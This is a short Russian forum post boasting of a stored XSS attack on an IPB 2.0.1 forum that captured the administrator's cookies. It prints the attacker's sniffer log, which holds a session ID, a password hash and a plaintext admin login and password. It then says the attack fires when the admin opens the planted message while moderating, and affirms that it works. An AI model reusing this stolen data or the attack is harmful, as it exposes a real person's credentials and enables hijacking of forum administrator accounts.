Не знаю как для кого, но для меня было потрясающей
новостью, что при использовании хсс ко мне пришли
куки админа, содержащие логин и пасс в
ОТКРЫТОМ виде. (Атаковался IPB 2.0.1)
-------------------------------------
Код:
IP: *.*.*.100
REFERER: http://***/forum/index.php?showtopic=175&st=80
QUERY: 69&member_id=1; pass_hash=f8447ce02eba492abe3249294aed4bf4;
forum_read=a:10:
{i:3;i:1134211808;i:2;i:1134174577;i:8;i:1134218332;i:
11;i:1134081264;i:13;i:1133595567;i:7;i:1133683890;i:
12;i:1133683875;i:10;i:1134174724;i:5;i:1133951226;i:
6;i:1134221372;};
acpcollapseprefs=100,200,900,1400; anonlogin=-1;
topicmode=linear; slogin=ariman;spass=tornado;
session_id=dcbf597a8db2190e362cf4ffd8b15dcb;
modtids=,; topicsread=a:1:{i:175;i:1134231356;}
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; SV1)
-------------------------------------
Как так получилось? Ответ:
В том случае если админ лезет модерировать форум и видит вашу мессагу,
к вам придет логин и пасс в открытом виде.
Проверено-канает.